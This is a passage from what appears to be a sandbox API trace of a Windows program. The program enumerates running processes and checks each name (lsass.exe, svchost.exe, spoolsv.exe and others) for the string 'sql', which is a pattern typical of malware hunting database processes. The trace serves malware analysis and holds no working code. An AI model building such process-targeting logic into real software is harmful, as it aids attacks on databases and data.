lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0152.735] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0152.736] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.737] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583ab8 [0152.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3583ab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0152.737] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0152.737] StrStrIA (lpFirst="winlogon.exe", lpSrch="sql") returned 0x0 [0152.737] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.738] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583a10 [0152.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3583a10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0152.738] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0152.738] StrStrIA (lpFirst="services.exe", lpSrch="sql") returned 0x0 [0152.739] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0152.740] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583b78 [0152.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3583b78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0152.740] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0152.740] StrStrIA (lpFirst="lsass.exe", lpSrch="sql") returned 0x0 [0152.740] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.741] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35839b0 [0152.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35839b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.741] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.742] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.742] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0152.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.743] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3583a28 [0152.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583a28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0152.743] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0152.743] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0152.743] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0152.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.744] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3583b90 [0152.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583b90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0152.745] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0152.745] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0152.745] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.746] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583ba8 [0152.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583ba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.746] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.746] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.746] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0152.747] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e398 [0152.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e398, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0152.748] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0152.748] StrStrIA (lpFirst="dwm.exe", lpSrch="sql") returned 0x0 [0152.748] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.749] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583c20 [0152.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583c20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.749] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.749] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.749] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.751] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583d40 [0152.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583d40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.751] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.751] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.751] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.752] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583c38 [0152.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583c38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.752] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.752] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.752] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.753] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583dd0 [0152.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583dd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.753] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.753] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.754] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.755] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583c98 [0152.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583c98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.755] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.755] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.755] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.756] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583cc8 [0152.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583cc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.756] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.756] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.756] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.758] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583d58 [0152.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583d58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.758] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.758] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.759] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583de8 [0152.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583de8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.759] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.759] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.759] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.762] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583d88 [0152.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583d88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.762] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.762] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.764] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583c50 [0152.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583c50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.764] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.764] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.764] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.765] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583cf8 [0152.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3583cf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0152.765] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0152.766] StrStrIA (lpFirst="spoolsv.exe", lpSrch="sql") returned 0x0 [0152.766] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.767] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583d70 [0152.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583d70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.767] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.767] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.767] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.769] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583c68 [0152.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3583c68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0152.769] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0152.769] StrStrIA (lpFirst="audiodg.exe", lpSrch="sql") returned 0x0 [0152.769] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0152.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0152.770] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583e78 [0152.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3583e78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0152.770] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0152.770] StrStrIA (lpFirst="sihost.exe", lpSrch="sql") returned 0x0 [0152.770] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0152.772] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583c80 [0152.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583c80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0152.772] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0152.772] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0152.772] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, 